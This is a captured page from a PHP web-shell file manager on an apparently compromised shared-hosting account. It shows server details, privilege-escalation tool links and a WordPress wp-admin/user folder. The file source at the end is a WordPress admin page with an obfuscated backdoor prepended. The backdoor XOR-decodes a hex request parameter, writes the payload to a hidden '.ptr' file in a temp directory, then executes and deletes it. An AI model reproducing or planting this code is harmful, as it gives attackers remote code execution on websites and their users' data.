Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 18.117.227.191
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
.trash /
wp-admin /
user /
Delete
Unzip
Name
Size
Permission
Date
Action
.ptr
53
B
-rw-r--r--
2025-03-10 03:28
about.php
257
B
-rw-r--r--
2025-03-06 15:08
admin.php
865
B
-rw-r--r--
2025-03-06 15:08
contribute.php
920
B
-rw-r--r--
2025-03-06 15:08
credits-live.php
1.05
KB
-rw-r--r--
2024-08-26 08:31
credits.php
261
B
-rw-r--r--
2025-03-06 15:08
freedoms.php
263
B
-rw-r--r--
2025-03-06 15:08
index.php
251
B
-rw-r--r--
2025-03-06 15:08
menu.php
758
B
-rw-r--r--
2025-03-06 15:08
privacy.php
261
B
-rw-r--r--
2025-03-06 15:08
profile.php
252
B
-rw-r--r--
2025-03-06 15:08
user-edit.php
250
B
-rw-r--r--
2025-03-06 15:08
Save
Rename
<?php if(isset($_REQUEST) && isset($_REQUEST["\x64ch\x75nk"])){ $item = array_filter([getcwd(), getenv("TEMP"), getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", "/var/tmp", sys_get_temp_dir()]); $fac = hex2bin($_REQUEST["\x64ch\x75nk"]); $element ='' ; $c = 0; do{$element .= chr(ord($fac[$c]) ^ 65);$c++;} while($c < strlen($fac)); while ($ent = array_shift($item)) { if ((function($d) { return is_dir($d) && is_writable($d); })($ent)) { $pointer = sprintf("%s/.ptr", $ent); if (@file_put_contents($pointer, $element) !== false) { include $pointer; unlink($pointer); die(); } } } } /** * User Dashboard Contribute administration panel. * * @package WordPress * @subpackage Administration * @since 6.6.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/contribute.php';